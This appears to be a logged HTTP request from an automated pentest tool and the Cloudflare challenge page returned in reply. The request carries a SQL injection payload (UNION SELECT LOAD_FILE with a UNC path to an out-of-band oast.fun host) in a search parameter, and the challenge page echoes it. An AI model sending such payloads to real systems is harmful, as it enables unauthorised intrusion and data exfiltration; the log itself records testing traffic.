REQUEST:
GET https://my.myfirst.tech/search?search=%27%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Ca%27%29%29--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:13 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9778
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c847383edba110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=mR8uZtv3TVMSWR%2FSfquQ9noQ1N9BRHpko8sIpPPTE%2F%2BrdBMXUr%2FHBFSJh3n%2FcRPVCwpErlsnNvT0cElOBwJPX6KjtO%2B%2BgGe4GjuWdjF8f2aRiWsGQJb8%2Fl2LORsdFry7U1j8N0c7FVkAq6NloQ%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c847383edba110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'bFzfOnhbRUDv_n2ecTRPtZjxdAGHA7AXcy0jmjlSI2A-1784281153-1.2.1.1-tP3Fvr2NKsJZPdCl8vsSrrX.36WGm_29vT0X8N9dLHUhmrU0_t7qaJ1bOMvHyYRo',cITimeS: '1784281153',cRay: 'a1c847383edba110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?search=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_tk=CJtIIUTUbxACFs53SmfMOMhsog7dTLdBsYLJz4oFohw-1784281153-1.0.1.1-J0EMHka0MEy4d5LnsZUxUWNRmSHPQWt7VSuqz636iGg",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?search=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_f_tk=CJtIIUTUbxACFs53SmfMOMhsog7dTLdBsYLJz4oFohw-1784281153-1.0.1.1-J0EMHka0MEy4d5LnsZUxUWNRmSHPQWt7VSuqz636iGg",md: 'I4hu7ObL83HlA2o291qecAjEUq80HuiizMifHEqPQ.8-1784281153-1.2.1.1-Iq_F2ZnQnep4kpj5mCAdv9hBDDrJ9IoC.K080h2Cy5TPaNRYrUtPmBYr7OUb8iymdvTlvToCq1l2fGccZ2R9nZaj4aOcqqJ.2pKE9uVUHDdsytIybDqPwRuVj8VN7jU_EfMPsFNbPsrPXewhPwWkQu2QpNwbnMGpH0ND0hc3eTsZHfoNRRByAGG1w4AHkdDNSW9o1e9X8XZdFldvzjL4219mGTLNzMVdsiapVStRJgYUavPZZST.bY35HxcURfUOa4V.HhBdcRIh6v1J6tEzYgKNTMJeKPS4ZHLPcc8iCXCRsqMTZJVGIPzLg4Wu6XBNS6Xm.yH0lLRdXFBVeb0FHfzP2qrus1oY0DsYzdg8LZtT1y.LSVfN3aCdYf4frJFBBBw3unc8Xnm53.mVIHzJRdCxhXTUI3dTX8Ay_EXG9MY83d1wceAIPf4YjE1TIMobGrfv9m0iEsPR5DBF690I5ayMY9xULXca1mQu_TlpiJ2RKw4S5Rn.HpWJnz0jvuwpmHYRCfep.Y.QyBaHZLmrHEFlCgdBmF_Wm8uYaQYo.JsDulfwZWjzcQdWrFjUmpZLSUVJDt9vSrFArT6KIYr.1NwyxzRKIomT6yCnHqPK4bXjzJiXxuH1g7M0GU_8CPddXUFTXZg3sKR7MUQwQ6baZS.lqgOVS9JM2GA0kxC67kfq.GyOrFkx61gfUQ36yhH8WJp6SoNRiB6xYQKdiZ5xGMCMcfo.5s9y9PvqzeoefAyOgEOD63b6lcq.2uuGyP5dSPjqE1CuelVvoTKoX9XvlX9ln7i18mPp1rafl3LH89cbWAPUOJFlpDoKDpasumE871Id5pKKFG90xtGkwiuvhvDzxQQWT420U2ja4aTeZAUBBESqIiQNPtZqVLeOpGbMSPX83v.iU_qpGUzKO5JXFLMe8NFhUazbTa6FVyjta51WzzrJ0clR67jDaSOXa1gEx2qXyInUdMEt8GzirHebWsVGsCtqBd_JMYMByPs9qfUkix65QBBOUcRLekrKZ17dUK.TYcOoPhiOxBAxwBB3MXO1OPiWbl88k6zJh7doVMfZKx5kCvAxUb4kgk8Lzb62hj_IoQLIMdtCHfI.o7YHYOWyTERNLGOgj7ZT7hVYBG_qhXvMGqDJEruLkuuKBiVQaliOdZUNzVq0UY5K1agppnW9gIMlq_V214mR3NKJa_KRxzkW7nndvT05d.3a.JHQuflYff1Xzp0gnbydm3aR_XO1FJSy5foZPxA9Jk74h7aGtxgstmH5MgBMLot1RPpCkn5T2dnWAWuBRNbu.zX5PCXRK91Z9Tqv_ygPkQqXPes',mdrd: '4zExziKUDAofxL1_QMoqQN8oEvkIeHKl3lQKeDLBLQ0-1784281153-1.2.1.1-X3exaXIfP40tqFxt.cmg5aH_DqwXzqpg0jP.jLc5AJCXTa28eUBFTSXjAlwsgJSAbKwD8Nx8UkyCGtw4sfXeIKJzidFGA7bjxumI52M3kxCN5irXRc9Jt63i1gz4cQjJUB6Azd67.XdhNSl_99CfP7GuHoq_OTBq.VwAQEYEyVI3ml5JadZB3Oig4PzyX4nuuSXjmzvkDjLk1cl_jETWsnrN0dM6kUttUJ1z6uYsLRhNpGym961.VCwOmAhurT2D',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c847383edba110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?search=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0z4j1bct9dfl36a.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_rt_tk=CJtIIUTUbxACFs53SmfMOMhsog7dTLdBsYLJz4oFohw-1784281153-1.0.1.1-J0EMHka0MEy4d5LnsZUxUWNRmSHPQWt7VSuqz636iGg"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
